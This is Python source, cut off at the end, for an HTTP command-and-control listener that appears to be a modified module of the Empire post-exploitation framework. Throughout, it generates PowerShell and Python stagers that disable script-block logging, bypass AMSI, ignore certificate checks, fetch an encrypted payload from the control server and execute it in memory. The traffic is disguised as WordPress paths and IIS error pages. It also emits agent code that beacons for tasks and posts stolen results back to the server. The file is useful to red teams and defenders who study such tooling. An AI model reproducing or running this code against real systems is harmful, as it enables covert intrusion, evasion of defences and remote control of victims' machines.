import logging import base64 import sys import random import string import os import ssl import time import copy import json import sys from pydispatch import dispatcher from flask import Flask, request, make_response, send_from_directory from lib.common import helpers from lib.common import agents from lib.common import encryption from lib.common import packets from lib.common import messages from lib.common import templating from lib.common import obfuscation class Listener: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'HTTP[S]', 'Author': ['@harmj0y'], 'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'), 'Category' : ('client_server'), 'Comments': [] } self.options = { 'Name' : { 'Description' : 'Name for the listener.', 'Required' : True, 'Value' : 'http' }, 'Host' : { 'Description' : 'Hostname/IP for staging.', 'Required' : True, 'Value' : "http://%s" % (helpers.lhost()) }, 'BindIP' : { 'Description' : 'The IP to bind to on the control server.', 'Required' : True, 'Value' : '0.0.0.0' }, 'Port' : { 'Description' : 'Port for the listener.', 'Required' : True, 'Value' : '' }, 'Launcher' : { 'Description' : 'Launcher string.', 'Required' : True, 'Value' : 'POWerShell.EXe -wIndO 1 -stA -noPrO -enc ' }, 'StagingKey' : { 'Description' : 'Staging key for initial agent negotiation.', 'Required' : True, 'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa' }, 'DefaultDelay' : { 'Description' : 'Agent delay/reach back interval (in seconds).', 'Required' : True, 'Value' : 5 }, 'DefaultJitter' : { 'Description' : 'Jitter in agent reachback interval (0.0-1.0).', 'Required' : True, 'Value' : 0.0 }, 'DefaultLostLimit' : { 'Description' : 'Number of missed checkins before exiting', 'Required' : True, 'Value' : 60 }, 'DefaultProfile' : { 'Description' : 'Default communication profile for the agent.', 'Required' : True, 'Value' : 
"/blog/,/wp-admin/login/,/brewery/,/shop?q=2341fdsar3qqa,/wp-content/plugins/square-sync/square-sync.css?ver=0.1,/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=3.5.3|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763|Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Language:en-US,en;q=0.5|Accept-Encoding:gzip, deflate" }, 'CertPath' : { 'Description' : 'Certificate path for https listeners.', 'Required' : False, 'Value' : '' }, 'KillDate' : { 'Description' : 'Date for the listener to exit (MM/dd/yyyy).', 'Required' : False, 'Value' : '' }, 'WorkingHours' : { 'Description' : 'Hours for the agent to operate (09:00-17:00).', 'Required' : False, 'Value' : '' }, 'Headers' : { 'Description' : 'Headers for the control server.', 'Required' : True, 'Value' : 'Server:Microsoft-IIS/10' }, 'Cookie' : { 'Description' : 'Custom Cookie Name', 'Required' : False, 'Value' : '' }, 'StagerURI' : { 'Description' : 'URI for the stager. Must use /download/. 
Example: /download/stager.php', 'Required' : False, 'Value' : '/download/wp-content/uploads/brewery.svg' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'SlackToken' : { 'Description' : 'Your SlackBot API token to communicate with your Slack instance.', 'Required' : False, 'Value' : '' }, 'SlackChannel' : { 'Description' : 'The Slack channel or DM that notifications will be sent to.', 'Required' : False, 'Value' : '#general' } } self.mainMenu = mainMenu self.threads = {} self.app = None self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0]) self.header_offset = random.randint(0, 64) self.session_cookie = '' if self.session_cookie == '': self.options['Cookie']['Value'] = self.generate_cookie() def default_response(self): """ Returns an IIS 7.5 404 not found page. 
""" return '\n'.join([ '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">', '<html xmlns="http://www.w3.org/1999/xhtml">', '<head>', '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>', '<title>404 - File or directory not found.</title>', '<style type="text/css">', '<!--', 'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}', 'fieldset{padding:0 15px 10px 15px;}', 'h1{font-size:2.4em;margin:0;color:#FFF;}', 'h2{font-size:1.7em;margin:0;color:#CC0000;}', 'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}', '#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;', 'background-color:#555555;}', '#content{margin:0 0 0 2%;position:relative;}', '.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}', '-->', '</style>', '</head>', '<body>', '<div id="header"><h1>Server Error</h1></div>', '<div id="content">', ' <div class="content-container"><fieldset>', ' <h2>404 - File or directory not found.</h2>', ' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>', ' </fieldset></div>', '</div>', '</body>', '</html>', ' ' * self.header_offset, ]) def index_page(self): """ Returns a default HTTP server page. 
""" return '\n'.join([ '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">', '<html xmlns="http://www.w3.org/1999/xhtml">', '<head>', '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />', '<title>IIS7</title>', '<style type="text/css">', '<!--', 'body {', ' color:#000000;', ' background-color:#B3B3B3;', ' margin:0;', '}', '', '#container {', ' margin-left:auto;', ' margin-right:auto;', ' text-align:center;', ' }', '', 'a img {', ' border:none;', '}', '', '-->', '</style>', '</head>', '<body>', '<div id="container">', '<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>', '</div>', '</body>', '</html>', ]) def validate_options(self): """ Validate all options for this listener. """ self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] for key in self.options: if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''): print helpers.color("[!] Option \"%s\" is required." % (key)) return False if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '': print helpers.color("[!] HTTPS selected but no CertPath specified.") return False return True def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None): """ Generate a basic launcher for the specified listener. """ if not language: print helpers.color('[!] 
listeners/http generate_launcher(): no language specified!') if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners): # extract the set options for this instantiated listener listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options'] host = listenerOptions['Host']['Value'] launcher = listenerOptions['Launcher']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] profile = listenerOptions['DefaultProfile']['Value'] uris = [a for a in profile.split('|')[0].split(',')] stage0 = random.choice(uris) customHeaders = profile.split('|')[2:] cookie = listenerOptions['Cookie']['Value'] # generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners if cookie == '': generate = self.generate_cookie() listenerOptions['Cookie']['Value'] = generate cookie = generate if language.startswith('po'): # PowerShell stager = '$ErrorActionPreference = \"SilentlyContinue\";' if safeChecks.lower() == 'true': stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") # ScriptBlock Logging bypass stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']" stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" stager += 
helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add") stager += "('EnableScriptB'+'lockLogging',0);" stager += helpers.randomize_capitalization("$val.Add") stager += "('EnableScriptBlockInvocationLogging',0);" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']" stager += helpers.randomize_capitalization("=$val}") stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") stager += "'signatures','N'+'onPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}};") # AMSI bypass stager += '$p6="iInitFai";$p1="System.Management";$p5="ams";$p4="iUtils";$p7="led";$p3="on.Ams";$p8="NonPub";$p9="lic,Stat";' stager += '$p10="ic";$p11=$null;$p12=$true;$p2=".Automati";[Ref].Assembly.GetType($p1+$p2+$p3+$p4).GetField($p5+$p6+$p7,$p8+$p9+$p10)' stager += '.SetValue($p11,$p12);' stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name("wc") + "= New-Object System.Net.WebClient;") if userAgent.lower() == 'default': profile = listenerOptions['DefaultProfile']['Value'] userAgent = profile.split('|')[1] stager += "$u='"+userAgent+"';" if 'https' in host: # allow for self-signed certificates for https connections stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" if userAgent.lower() != 'none': stager += helpers.randomize_capitalization('$' + helpers.generate_random_script_var_name("wc") + '.Headers.Add(') stager += "'User-Agent',$u);" if 
userAgent.lower() != 'none': stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(') stager += "'User-Agent',$u);" if proxy.lower() != 'none': if proxy.lower() == 'default': stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;") else: # TODO: implement form for other proxy stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('") stager += proxy.lower() stager += helpers.randomize_capitalization("');") stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;") if proxyCreds.lower() != 'none': if proxyCreds.lower() == "default": stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;") else: # TODO: implement form for other proxy credentials username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] if len(username.split('\\')) > 1: usr = username.split('\\')[1] domain = username.split('\\')[0] stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');" else: usr = username.split('\\')[0] stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;") #save the proxy settings to use during the entire staging process and the agent stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;" # TODO: reimplement stager retries? 
#check if we're using IPv6 listenerOptions = copy.deepcopy(listenerOptions) bindIP = listenerOptions['BindIP']['Value'] port = listenerOptions['Port']['Value'] if ':' in bindIP: if "http" in host: if "https" in host: host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port) else: host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port) stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += "'%s');" % (stagingKey) stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};') routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';" if customHeaders != []: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] if headerKey.lower() == "host": stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};") stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(") stager += "\"%s\",\"%s\");" % (headerKey, headerValue) stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(") stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket) stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);") stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];") stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX") if obfuscate: stager = helpers.obfuscate(self.mainMenu.installPath, stager, 
obfuscationCommand=obfuscationCommand) if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())): return helpers.powershell_launcher(stager, launcher) else: return stager if language.startswith('py'): launcherBase = 'import sys;' if "https" in host: launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n" try: if safeChecks.lower() == 'true': launcherBase += "import re, subprocess;" launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n" launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n" launcherBase += "out, err = ps.communicate()\n" launcherBase += "if re.search(\"Little Snitch\", out):\n" launcherBase += " sys.exit()\n" except Exception as e: p = "[!] Error setting LittleSnitch in stager: " + str(e) print helpers.color(p, color='red') if userAgent.lower() == 'default': profile = listenerOptions['DefaultProfile']['Value'] userAgent = profile.split('|')[1] launcherBase += "import urllib2;\n" launcherBase += "UA='%s';" % (userAgent) launcherBase += "server='%s';t='%s';" % (host, stage0) routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) launcherBase += "req=urllib2.Request(server+t);\n" launcherBase += "req.add_header('User-Agent',UA);\n" launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket) if customHeaders != []: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) if proxy.lower() != "none": if proxy.lower() == "default": launcherBase += "proxy = urllib2.ProxyHandler();\n" else: proto = proxy.split(':')[0] launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n" if 
proxyCreds != "none": if proxyCreds == "default": launcherBase += "o = urllib2.build_opener(proxy);\n" else: launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib2.build_opener(proxy);\n" else: launcherBase += "o = urllib2.build_opener();\n" launcherBase += "urllib2.install_opener(o);\n" launcherBase += "a=urllib2.urlopen(req).read();\n" launcherBase += "IV=a[0:4];" launcherBase += "data=a[4:];" launcherBase += "key=IV+'%s';" % (stagingKey) launcherBase += "S,j,out=range(256),0,[]\n" launcherBase += "for i in range(256):\n" launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += "i=j=0\n" launcherBase += "for char in data:\n" launcherBase += " i=(i+1)%256\n" launcherBase += " j=(j+S[i])%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n" launcherBase += "exec(''.join(out))" if encode: launchEncoded = base64.b64encode(launcherBase) launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded) return launcher else: return launcherBase else: print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.") else: print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!") def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None): """ Generate the stager code needed for communications with this listener. """ if not language: print helpers.color('[!] 
listeners/http generate_stager(): no language specified!') return None profile = listenerOptions['DefaultProfile']['Value'] uris = [a.strip('/') for a in profile.split('|')[0].split(',')] launcher = listenerOptions['Launcher']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] workingHours = listenerOptions['WorkingHours']['Value'] killDate = listenerOptions['KillDate']['Value'] host = listenerOptions['Host']['Value'] customHeaders = profile.split('|')[2:] stage1 = random.choice(uris) stage2 = random.choice(uris) if language.lower() == 'powershell': f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath)) stager = f.read() f.close() if not host.endswith("/"): host += "/" remove = [] if customHeaders != []: for key in customHeaders: value = key.split(":") if 'cookie' in value[0].lower() and value[1]: continue remove += value headers = ','.join(remove) stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";") if workingHours != "": stager = stager.replace('WORKING_HOURS_REPLACE', workingHours) if killDate != "": stager = stager.replace('REPLACE_KILLDATE', killDate) stager = stager.replace('REPLACE_SERVER', host) stager = stager.replace('REPLACE_STAGING_KEY', stagingKey) stager = stager.replace('index.jsp', stage1) stager = stager.replace('index.php', stage2) randomizedStager = '' for line in stager.split("\n"): line = line.strip() if not line.startswith("#"): if "\"" not in line: randomizedStager += helpers.randomize_capitalization(line) else: randomizedStager += line if obfuscate: randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode: return helpers.enc_powershell(randomizedStager) elif encrypt: RC4IV = os.urandom(4) return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager) else: # otherwise just return the case-randomized stager return randomizedStager elif language.lower() == 'python': 
template_path = [ os.path.join(self.mainMenu.installPath, '/data/agent/stagers'), os.path.join(self.mainMenu.installPath, './data/agent/stagers')] eng = templating.TemplateEngine(template_path) template = eng.get_template('http.py') template_options = { 'working_hours': workingHours, 'kill_date': killDate, 'staging_key': stagingKey, 'profile': profile, 'stage_1': stage1, 'stage_2': stage2 } stager = template.render(template_options) stager = obfuscation.py_minify(stager) # base64 encode the stager and return it if encode: return base64.b64encode(stager) if encrypt: # return an encrypted version of the stager ("normal" staging) RC4IV = os.urandom(4) return RC4IV + encryption.rc4(RC4IV+stagingKey, stager) else: # otherwise return the standard stager return stager else: print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""): """ Generate the full agent code needed for communications with this listener. """ if not language: print helpers.color('[!] 
listeners/http generate_agent(): no language specified!') return None language = language.lower() delay = listenerOptions['DefaultDelay']['Value'] jitter = listenerOptions['DefaultJitter']['Value'] profile = listenerOptions['DefaultProfile']['Value'] lostLimit = listenerOptions['DefaultLostLimit']['Value'] killDate = listenerOptions['KillDate']['Value'] workingHours = listenerOptions['WorkingHours']['Value'] b64DefaultResponse = base64.b64encode(self.default_response()) if language == 'powershell': f = open(self.mainMenu.installPath + "./data/agent/agent.ps1") code = f.read() f.close() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = helpers.strip_powershell_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay)) code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter)) code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"") code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit)) code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"') # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code elif language == 'python': f = open(self.mainMenu.installPath + "./data/agent/agent.py") code = f.read() f.close() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = 
helpers.strip_python_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('delay = 60', 'delay = %s' % (delay)) code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter)) code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile)) code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit)) code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse)) # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate)) if workingHours != "": code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate)) return code else: print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") def generate_comms(self, listenerOptions, language=None): """ Generate just the agent communication code block needed for communications with this listener. This is so agents can easily be dynamically updated for the new listener. 
""" if language: if language.lower() == 'powershell': updateServers = """ $Script:ControlServers = @("%s"); $Script:ServerIndex = 0; """ % (listenerOptions['Host']['Value']) if listenerOptions['Host']['Value'].startswith('https'): updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" getTask = """ $script:GetTask = { try { if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) { # meta 'TASKING_REQUEST' : 4 $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4 $RoutingCookie = [Convert]::ToBase64String($RoutingPacket) # build the web request object $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; if($Script:Proxy) { $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy; } $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent) $script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)} $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + self.session_cookie + """=$RoutingCookie") # choose a random valid URI for checkin $taskURI = $script:TaskURIs | Get-Random $result = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI) $result } } catch [Net.WebException] { $script:MissedCheckins += 1 if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } """ sendMessage = """ $script:SendMessage = { param($Packets) if($Packets) { # build and encrypt the response 
packet $EncBytes = Encrypt-Bytes $Packets # build the top level RC4 "routing packet" # meta 'RESULT_POST' : 5 $RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5 if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) { # build the web request object $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; if($Script:Proxy) { $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy; } $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent) $Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)} try { # get a random posting URI $taskURI = $Script:TaskURIs | Get-Random $response = $"""+helpers.generate_random_script_var_name("wc")+""".UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket); } catch [System.Net.WebException]{ # exception posting data... if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } } } """ return updateServers + getTask + sendMessage elif language.lower() == 'python': updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value']) if listenerOptions['Host']['Value'].startswith('https'): updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None" sendMessage = """ def send_message(packets=None): # Requests a tasking or posts data to a randomized tasking URI. # If packets == None, the agent GETs a tasking from the control server. 
# If packets != None, the agent encrypts the passed packets and # POSTs the data to the control server. global missedCheckins global server global headers global taskURIs data = None if packets: data = ''.join(packets) # aes_encrypt_then_hmac is in stager.py encData = aes_encrypt_then_hmac(key, data) data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) else: # if we're GETing taskings, then build the routing packet to stuff info a cookie first. # meta TASKING_REQUEST = 4 routingPacket = build_routing_packet(stagingKey, sessionID, meta=4) b64routingPacket = base64.b64encode(routingPacket) headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket) taskURI = random.sample(taskURIs, 1)[0] requestUri = server + taskURI try: data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read() return ('200', data) except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 #if signaled for restaging, exit. if HTTPError.code == 401: sys.exit(0) return (HTTPError.code, '') except urllib2.URLError as URLerror: # if the server cannot be reached missedCheckins = missedCheckins + 1 return (URLerror.reason, '') return ('', '') """ return updateServers + sendMessage else: print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") else: print helpers.color('[!] listeners/http generate_comms(): no language specified!') def start_server(self, listenerOptions): """ Threaded function that actually starts up the Flask server. 
""" # make a copy of the currently set listener options for later stager/agent generation listenerOptions = copy.deepcopy(listenerOptions) # suppress the normal Flask output log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) bindIP = listenerOptions['BindIP']['Value'] host = listenerOptions['Host']['Value'] port = listenerOptions['Port']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] stagerURI = listenerOptions['StagerURI']['Value'] userAgent = self.options['UserAgent']['Value'] listenerName = self.options['Name']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] app = Flask(__name__) self.app = app @app.route('/download/<stager>') def send_stager(stager): if 'po' in stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher elif 'py' in stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher else: return make_response(self.default_response(), 404) @app.route('/wp-admin/<domain>/<username>/<hostname>', methods=['GET']) def check_agent(domain,username,hostname): """ Check if an active agent already exists for a particular user, on a particular host. """ username = domain + "\\" + username result = self.mainMenu.agents.get_agents_by_username_host(username, hostname) if result: # Powershell base64 encoded command: "exit;" return "ZQB4AGkAdAA7AAoA" else: launcher = self.mainMenu.stagers.generate_launcher(listenerName,language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) launcher = helpers.enc_powershell(launcher) return launcher @app.before_request def check_ip(): """ Before every request, check if the IP address is allowed. 
""" if not self.mainMenu.agents.is_ip_allowed(request.remote_addr): listenerName = self.options['Name']['Value'] message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) @app.after_request def change_header(response): "Modify the headers response server." headers = listenerOptions['Headers']['Value'] for key in headers.split("|"): value = key.split(":") response.headers[value[0]] = value[1] return response @app.after_request def add_proxy_headers(response): "Add HTTP headers to avoid proxy caching." response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate" response.headers['Pragma'] = "no-cache" response.headers['Expires'] = "0" return response @app.route('/') @app.route('/index.html') def serve_index(): """ Return default server web page if user navigates to index. """ static_dir = self.mainMenu.installPath + "data/misc/" return make_response(self.index_page(), 200) @app.route('/welcome.png') def serve_index_helper(): """ Serves image loaded by index page. """ static_dir = self.mainMenu.installPath + "data/misc/" return send_from_directory(static_dir, 'welcome.png') @app.route('/<path:request_uri>', methods=['GET']) def handle_get(request_uri): """ Handle an agent GET request. This is used during the first step of the staging 